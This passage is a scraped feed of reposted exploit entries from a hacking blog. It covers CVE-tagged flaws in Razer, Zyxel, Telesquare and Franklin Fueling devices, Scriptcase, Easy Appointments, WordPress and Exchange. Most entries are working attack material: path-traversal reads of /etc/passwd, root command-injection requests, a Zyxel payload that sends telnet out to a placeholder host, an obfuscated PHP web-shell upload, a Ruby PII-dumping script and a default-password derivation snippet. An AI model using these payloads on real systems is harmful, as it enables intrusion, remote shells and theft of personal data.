Connection: close Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D Upgrade-Insecure-Requests: 1
  13. HireHackking

    MiniTool Partition Wizard - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: MiniTool Partition Wizard - Unquoted Service Path # Date: 07/04/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.minitool.com/ # Software Link: https://www.minitool.com/download-center/ # Version: 12.0 # Tested: Windows 10 Pro x64 es # PoC : C:\Users\saudh>sc qc MTSchedulerService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MTSchedulerService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTSchedulerService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe" C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files
  14. HireHackking

    Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Franklin Fueling Systems Colibri Controller Module 1.8.19.8580 - Local File Inclusion (LFI) # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: https://www.franklinfueling.com/ # Version: 1.8.19.8580 # Tested on: Linux [Firefox] # CVE : CVE-2021-46417 # Proof of Concept ============[ HTTP Exploitation ]============ GET /18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1 Host: 192.168.1.6 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: Prefs=LID%3Des%3BPDS%3DMM/dd/yyyy%3BPDL%3DEEEE%2C%20MMMM%20dd%2C%20yyyy%3BPDY%3DMMMM%2C%20yyyy%3BPTS%3DHH%3Amm%3BPTL%3DHH%3Amm%3Ass%3BDSP%3D.%3BGSP%3D%2C%3BGRP%3D3%3BLDZ%3Dtrue%3BUVL%3DuvGallons%3BULN%3DulMillimeters%3BUTM%3DutCentigrade%3BUPR%3DupPSI%3BUP2%3Dup2inWater%3BUP3%3Dup3inHg%3BUFL%3Dufgpm%3BUDY%3Dudkgpcm%3BUMS%3Dumkgrams%3BRPR%3D30%3BXML%3Dfalse%3B Upgrade-Insecure-Requests: 1 ============[ URL Exploitation ]============ http://192.168.1.6/18198580/cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password=
  15. HireHackking

    Razer Sila - Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Razer Sila - Command Injection # Google Dork: N/A # Date: 4/9/2022 # Exploit Author: Kevin Randall # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A # Proof of Concept # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 85 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"uid=0(root) gid=0(root)\n"}]} # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 117 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"ls"}]} # Response HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 172 {"jsonrpc":"2.0","id":3,"result":[0,{"code":0,"stdout":"bin\ndev\netc\nhome\ninit\nlib\nmnt\nno_gui\noverlay\nproc\nrom\nroot\nsbin\nservices\nsys\ntmp\nusr\nvar\nwww\n"}]}
  16. HireHackking

    Telesquare TLR-2855KS6 - Arbitrary File Creation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Creation # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.telesquare.co.kr/ # Version: TLR-2855KS6 # Tested on: Linux [Firefox] # CVE : CVE-2021-46418 # Proof of Concept PUT /cgi-bin/testing_cve.txt HTTP/1.1 Host: 192.168.1.5 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: nonce=1642692359833588 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 32
  17. HireHackking

    Telesquare TLR-2855KS6 - Arbitrary File Deletion

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion # Date: 7/4/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.telesquare.co.kr/ # Version: TLR-2855KS6 # Tested on: Linux [Firefox] # CVE : CVE-2021-46419 # Proof of Concept DELETE /cgi-bin/test.cgi HTTP/1.1 Host: 192.168.1.5 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-type: application/x-www-form-urlencoded Content-Length: 438 Origin: http://192.168.1.5 DNT: 1 Connection: close Referer: http://192.168.1.5/ Cookie: nonce=16426923592222
  18. HireHackking

    Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Exchange Mailbox Assistants 15.0.847.40 - 'Service MSExchangeMailboxAssistants' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-04-11 # Vendor : Microsoft # Version : 15.0.847.40 # Tested on OS: Microsoft Exchange Server 2013 SP1 #PoC : ============== C:\>sc qc MSExchangeMailboxAssistants [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeMailboxAssistants TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Mailbox Assistants DIPENDENZE : SERVICE_START_NAME : LocalSystem
  19. HireHackking

    Razer Sila - Local File Inclusion (LFI)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Razer Sila - Local File Inclusion (LFI) # Google Dork: N/A # Date: 4/9/2022 # Exploit Author: Kevin Randall # Vendor Homepage: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Software Link: https://www2.razer.com/ap-en/desktops-and-networking/razer-sila # Version: RazerSila-2.0.441_api-2.0.418 # Tested on: Razer Sila Router # CVE N/A # Proof of Concept # Request POST /ubus/ HTTP/1.1 Host: 192.168.8.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 123 Origin: https://192.168.8.1 Referer: https://192.168.8.1/ Te: trailers Connection: close {"jsonrpc":"2.0","id":3,"method":"call","params":["4183f72884a98d7952d953dd9439a1d1","file","read",{"path":"/etc/passwd"}]} # Reponse HTTP/1.1 200 OK Connection: close Content-Type: application/json Content-Length: 537 {"jsonrpc":"2.0","id":3,"result":[0,{"data":"root:x:0:0:root:\/root:\/bin\/ash\ndaemon:*:1:1:daemon:\/var:\/bin\/false\nftp:*:55:55:ftp:\/home\/ftp:\/bin\/false\nnetwork:*:101:101:network:\/var:\/bin\/false\nnobody:*:65534:65534:nobody:\/var:\/bin\/false\ndnsmasq:x:453:453:dnsmasq:\/var\/run\/dnsmasq:\/bin\/false\nmosquitto:x:200:200:mosquitto:\/var\/run\/mosquitto:\/bin\/false\nlldp:x:121:129:lldp:\/var\/run\/lldp:\/bin\/false\nadmin:x:1000:1000:root:\/home\/admin:\/bin\/false\nportal:x:1001:1001::\/home\/portal:\/bin\/false\n"}]}
  20. HireHackking

    WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Motopress Hotel Booking Lite 4.2.4 - SQL Injection # Date: 2022-04-11 # Exploit Author: Mohsen Dehghani (aka 0xProfessional) # Vendor Homepage: https://motopress.com/ # Software Link: https://downloads.wordpress.org/plugin/motopress-hotel-booking-lite.4.2.4.zip # Version: 4.2.4 # Tested on: Windows/XAMPP ########################################################################### PoC: Vulnerable File:sync-urls-repository.php public function insertUrls($roomId, $urls) { global $wpdb; if (empty($urls)) { return; } $urls = $this->prepareUrls($urls); $values = array(); foreach ($urls as $syncId => $url) { $values[] = $wpdb->prepare("(%d, %s, %s)", $roomId, $syncId, $url); } $sql = "INSERT INTO {$this->tableName} (room_id, sync_id, calendar_url)" . " VALUES " . implode(', ', $values); $wpdb->query($sql); Vulnerable Parameter: room_id=SQL Injection sync_id=SQL Injection
  21. HireHackking

    Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Microsoft Exchange Active Directory Topology 15.0.847.40 - 'Service MSExchangeADTopology' Unquoted Service Path # Exploit Author: Antonio Cuomo (arkantolo) # Exploit Date: 2022-04-11 # Vendor : Microsoft # Version : 15.0.847.40 # Tested on OS: Microsoft Exchange Server 2013 SP1 #PoC : ============== C:\>sc qc MSExchangeADTopology [SC] QueryServiceConfig OPERAZIONI RIUSCITE NOME_SERVIZIO: MSExchangeADTopology TIPO : 10 WIN32_OWN_PROCESS TIPO_AVVIO : 2 AUTO_START CONTROLLO_ERRORE : 1 NORMAL NOME_PERCORSO_BINARIO : C:\Program Files\Microsoft\Exchange Server\V15\Bin\Microsoft.Exchange.Directory.TopologyService.exe GRUPPO_ORDINE_CARICAMENTO : TAG : 0 NOME_VISUALIZZATO : Microsoft Exchange Active Directory Topology DIPENDENZE : SERVICE_START_NAME : LocalSystem
  22. HireHackking

    Easy Appointments 1.4.2 - Information Disclosure

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Easy Appointments 1.4.2 - Information Disclosure # Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr) # Author website: https://pwn.by/noraj/ # Exploit source: https://github.com/Acceis/exploit-CVE-2022-0482 # Date: 2022-04-11 # Vendor Homepage: https://easyappointments.org/ # Software Link: https://github.com/alextselegidis/easyappointments/archive/refs/tags/1.4.2.tar.gz # Version: < 1.4.3 (it means up to 1.4.2) # Tested on: Easy!Appointments Version 1.3.2 # Vulnerability ## Discoverer: Francesco CARLUCCI ## Date: 2022-01-30 ## Discoverer website: https://carluc.ci/ ## Discovered on OpenNetAdmin 1.4.2 ## Title: Exposure of Private Personal Information to an Unauthorized Actor in alextselegidis/easyappointments ## CVE: CVE-2022-0482 ## CWE: CWE-863 ## Patch: https://github.com/alextselegidis/easyappointments/commit/bb71c9773627dace180d862f2e258a20df84f887#diff-4c48e5652fb13f13d2a50b6fb5d7027321913c4f8775bb6d1e8f79492bdd796c ## References: ## - https://huntr.dev/bounties/2fe771ef-b615-45ef-9b4d-625978042e26/ ## - https://github.com/alextselegidis/easyappointments/tree/1.4.2 ## - https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-0482.yaml ## - https://opencirt.com/hacking/securing-easy-appointments-cve-2022-0482/ ## - https://nvd.nist.gov/vuln/detail/CVE-2022-0482 #!/usr/bin/env ruby require 'date' require 'httpx' require 'docopt' doc = <<~DOCOPT Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure Source: https://github.com/Acceis/exploit-CVE-2022-0482 Usage: #{__FILE__} <url> [<startDate> <endDate>] [--debug] #{__FILE__} -h | --help Options: <url> Root URL (base path) including HTTP scheme, port and root folder <startDate> All events since (default: 2015-01-11) <endDate> All events until (default: today) --debug Display arguments -h, --help Show this screen Examples: #{__FILE__} http://10.0.0.1 #{__FILE__} https://10.0.0.1:4567/subdir 2022-04-01 2022-04-30 DOCOPT def fetch_csrf(root_url, http) vuln_url = "#{root_url}/index.php" http.get(vuln_url) end def exploit(root_url, startDate, endDate, http) vuln_url = "#{root_url}/index.php/backend_api/ajax_get_calendar_events" params = { 'csrfToken' => http.cookies.first.value, # csrfCookie 'startDate' => startDate.nil? ? '2015-01-11' : startDate, 'endDate' => endDate.nil? ? Date.today.to_s : endDate } http.post(vuln_url, form: params) end begin args = Docopt.docopt(doc) pp args if args['--debug'] http = HTTPX.plugin(:cookies) fetch_csrf(args['<url>'], http) puts exploit(args['<url>'], args['<startDate>'], args['<endDate>'], http).body rescue Docopt::Exit => e puts e.message end
  23. HireHackking

    Zyxel NWA-1100-NH - Command Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zyxel NWA-1100-NH - Command Injection # Date: 12/4/2022 # Exploit Author: Ahmed Alroky # Vendor Homepage: https://www.zyxel.com/homepage.shtml # Version: ALL BEFORE 2.12 # Tested on: Linux # CVE : CVE-2021-4039 # References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf , https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml HTTP Request : POST /login/login.html HTTP/1.1 Host: IP_address:8081 Content-Length: 80 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http:/IP_address:8081 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://IP_address:8081/login/login.html Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
  24. HireHackking

    Scriptcase 9.7 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell # Date: 2022-04-08 # Exploit Author: luckyt0mat0 # Vendor Homepage: https://www.scriptcase.net/ # Software Link: https://www.scriptcase.net/download/ # Version: 9.7 # Tested on: Windows Server 2019 # Proof of Concept: POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1 Host: 10.50.1.214:8091 Content-Length: 570 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ Origin: http://10.50.1.214:8091 Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us Connection: close ------WebKitFormBoundary6gbgDzCQ2aZWm6iZ Content-Disposition: form-data; name="jqul_csrf_token" gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M ------WebKitFormBoundary6gbgDzCQ2aZWm6iZ Content-Disposition: form-data; name="files[]"; filename="123.php" Content-Type: text/html <?php error_reporting(0); $a = rad2deg^(3).(2); $b = asin^(2).(6); $c = ceil^(1).(1); $exp = $a.$b.$c; //assert $pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET $pi=$$pi; //$_GET call_user_func($exp,$pi{0}($pi{1})); ?> ------WebKitFormBoundary6gbgDzCQ2aZWm6iZ——— # Notes: - PHPSESSID is - be1281e8cde9348d284c3074c9bea53e - Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php
  25. HireHackking

    Verizon 4G LTE Network Extender - Weak Credentials Algorithm

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm Exploit Author: LiquidWorm Vendor: Verizon Communications Inc. Product web page: https://www.verizon.com Affected version: GA4.38 - V0.4.038.2131 Summary: An LTE Network Extender enhances your indoor and 4G LTE data and voice coverage to provide better service for your 4G LTE mobile devices. It's an extension of our 4G LTE network that's placed directly in your home or office. The LTE Network Extender works with all Verizon-sold 4G LTE mobile devices for 4G LTE data service and HD Voice-capable 4G LTE devices for voice service. This easy-to-install device operates like a miniature cell tower that plugs into your existing high-speed broadband connection to communicate with the Verizon wireless network. Desc: Verizon's 4G LTE Network Extender is utilising a weak default admin password generation algorithm. The password is generated using the last 4 values from device's MAC address which is disclosed on the main webUI login page to an unauthenticated attacker. The values are then concatenated with the string 'LTEFemto' resulting in something like 'LTEFemtoD080' as the default Admin password. Tested on: lighttpd-web Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5701 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php 17.02.2022 -- snippet:///Exploit // // Verizon 4G LTE Network Extender Super Awesome JS Exploit // console.log("Calling 'isDefaultPassword' API"); let req = new Request("/webapi/isDefaultPassword"); let def = req.url; const doAjax = async () => { const resp = await fetch(def); if (resp.ok) { const jsonyo = await resp.json(); return Promise.resolve(jsonyo); } else { return Promise.reject("Smth not rite captain!"); } } doAjax().then(console.log).catch(console.log); await new Promise(t => setTimeout(t, 1337)); console.log("Verizon Admin Password: "); let mac = document.querySelector("#mac_address").innerHTML; console.log("LTEFemto" + mac.substr(-4));